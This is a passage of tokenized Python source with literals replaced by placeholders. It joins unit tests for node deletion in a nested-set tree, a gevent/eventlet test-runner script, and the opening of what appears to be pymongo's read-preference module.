'<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child21221 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child21222 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child22 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child23 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_root3 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> combined_del_result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:16> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> def test_combined_del_123 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_132 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_213 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_231 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_312 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_321 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( DeletionTestCase ) ) <EOL> return suite </s>
<s> """<STR_LIT>""" <EOL> import getopt <EOL> import sys <EOL> def run_gevent ( ) : <EOL> """<STR_LIT>""" <EOL> from gevent import monkey <EOL> monkey . patch_all ( ) <EOL> def run_eventlet ( ) : <EOL> """<STR_LIT>""" <EOL> import eventlet <EOL> eventlet . monkey_patch ( ) <EOL> FRAMEWORKS = { <EOL> '<STR_LIT>' : run_gevent , <EOL> '<STR_LIT>' : run_eventlet , <EOL> } <EOL> def list_frameworks ( ) : <EOL> """<STR_LIT>""" <EOL> sys . stdout . write ( """<STR_LIT>""" % "<STR_LIT:U+002CU+0020>" . join ( sorted ( FRAMEWORKS ) ) ) <EOL> def run ( framework_name , * args ) : <EOL> """<STR_LIT>""" <EOL> FRAMEWORKS [ framework_name ] ( ) <EOL> sys . argv [ : ] = [ '<STR_LIT>' , '<STR_LIT:test>' ] + list ( args ) <EOL> import setup <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> usage = """<STR_LIT>""" % ( sys . argv [ <NUM_LIT:0> ] , sys . argv [ <NUM_LIT:0> ] ) <EOL> try : <EOL> opts , args = getopt . getopt ( <EOL> sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT:h>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError as err : <EOL> print ( str ( err ) ) <EOL> print ( usage ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for option_name , _ in opts : <EOL> if option_name in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> print ( usage ) <EOL> sys . exit ( ) <EOL> elif option_name == "<STR_LIT>" : <EOL> list_frameworks ( ) <EOL> sys . exit ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> if not args : <EOL> print ( usage ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args [ <NUM_LIT:0> ] not in FRAMEWORKS : <EOL> print ( '<STR_LIT>' % args [ <NUM_LIT:0> ] ) <EOL> list_frameworks ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> run ( args [ <NUM_LIT:0> ] , <EOL> * args [ <NUM_LIT:1> : ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from collections import Mapping <EOL> from pymongo . errors import ConfigurationError <EOL> from pymongo . server_selectors import ( member_with_tags_server_selector , <EOL> secondary_with_tags_server_selector , <EOL> writable_server_selector ) <EOL> _PRIMARY = <NUM_LIT:0> <EOL> _PRIMARY_PREFERRED = <NUM_LIT:1> <EOL> _SECONDARY = <NUM_LIT:2> <EOL> _SECONDARY_PREFERRED = <NUM_LIT:3> <EOL> _NEAREST = <NUM_LIT:4> <EOL> _MONGOS_MODES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def _validate_tag_sets ( tag_sets ) : <EOL> """<STR_LIT>""" <EOL> if tag_sets is None : <EOL> return tag_sets <EOL> if not isinstance ( tag_sets , list ) : <EOL> raise TypeError ( ( <EOL> "<STR_LIT>" ) % ( tag_sets , ) ) <EOL> if len ( tag_sets ) == <NUM_LIT:0> : <EOL> raise ValueError ( ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( tag_sets , ) ) <EOL> for tags in tag_sets : <EOL> if not isinstance ( tags , Mapping ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( tags , ) ) <EOL> return tag_sets <EOL> class _ServerMode ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def __init__ ( self , mode , tag_sets = None ) : <EOL> if mode == _PRIMARY and tag_sets is not None : <EOL> raise ConfigurationError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . __mongos_mode = _MONGOS_MODES [ mode ] <EOL> self . __mode = mode <EOL> self . __tag_sets = _validate_tag_sets ( tag_sets ) <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __class__ . __name__ <EOL> @ property <EOL> def document ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __tag_sets in ( None , [ { } ] ) : <EOL> return { '<STR_LIT>' : self . __mongos_mode } <EOL> return { '<STR_LIT>' : self . __mongos_mode , '<STR_LIT>' : self . __tag_sets } <EOL> @ property <EOL> def mode ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __mode <EOL> @ property <EOL> def tag_sets ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __tag_sets ) if self . __tag_sets else [ { } ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . name , self . __tag_sets 